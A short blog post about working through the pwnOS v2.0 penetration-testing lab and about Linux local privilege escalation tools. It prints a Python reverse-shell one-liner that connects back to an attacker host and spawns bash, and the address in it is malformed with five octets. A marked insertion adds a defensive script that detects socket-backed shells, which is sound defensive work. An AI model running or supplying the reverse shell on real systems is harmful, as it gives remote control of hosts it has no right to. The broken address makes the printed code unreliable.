PwnOS and Linux local privilege escalation

So I have been playing around with pwnOS v2.0. For spoilers, you can refer to this link. Due to my lack of attention, I did not spot the duplicate file and hence, did not get any valid root passwords, but knowing the solution, it does seem like quite a bit of a letdown.

One thing I did slightly differently was to use a Python reverse shell documented by pentestmonkey in the sqlmap --os-shell context. This worked sufficiently to give me an OOB shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
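The one-liner works by duplicating a single connected socket onto file descriptors 0, 1 and 2 before starting bash, and that leaves a trace a defender can look for on the host. The following is an added example, not part of the original post: a triage script that walks /proc and reports every process whose stdin, stdout and stderr all resolve to the same socket. The function names and the proc_root parameter are assumptions made for this example.

```python
import os
import re

# /proc/<pid>/fd/N is a symlink; for sockets the target reads "socket:[<inode>]".
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")

def stdio_socket_inode(fd_dir):
    """Return the socket inode if fds 0, 1 and 2 all point at one socket, else None."""
    inodes = set()
    for fd in ("0", "1", "2"):
        try:
            target = os.readlink(os.path.join(fd_dir, fd))
        except OSError:  # process exited, fd closed, or no permission to look
            return None
        match = SOCKET_LINK.match(target)
        if not match:    # a tty, pipe or regular file: not the pattern we want
            return None
        inodes.add(match.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def read_cmdline(proc_dir):
    """Return the NUL-separated command line as a printable string."""
    try:
        with open(os.path.join(proc_dir, "cmdline"), "rb") as fh:
            raw = fh.read()
    except OSError:
        return ""
    return raw.replace(b"\0", b" ").decode("utf-8", "replace").strip()

def find_socket_backed_shells(proc_root="/proc"):
    """Return (pid, socket_inode, cmdline) for each process whose stdio is one socket."""
    hits = []
    pids = sorted(int(e) for e in os.listdir(proc_root) if e.isdigit())
    for pid in pids:
        proc_dir = os.path.join(proc_root, str(pid))
        inode = stdio_socket_inode(os.path.join(proc_dir, "fd"))
        if inode is not None:
            hits.append((pid, inode, read_cmdline(proc_dir)))
    return hits

if __name__ == "__main__":
    # Run as root to see every process; unprivileged runs only see your own.
    for pid, inode, cmdline in find_socket_backed_shells():
        print(f"pid={pid} socket_inode={inode} cmd={cmdline!r}")
```

Both the python process and the bash child it spawns inherit the descriptors, so both show up. inetd-style services that are handed a connected socket as stdio match too, so treat hits as leads to check against the command line rather than as verdicts.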

One tool which I had also encountered was Linux Exploit Suggester, although it seemed to have been updated about 5 months ago. Still, I'm sure it could be very useful if you have non-privileged shell access to an older, not-as-frequently-updated Linux box, and are searching for local privesc root exploits. I would also recommend this site for a list of commands you should run in order to enumerate the system after getting said shell access.
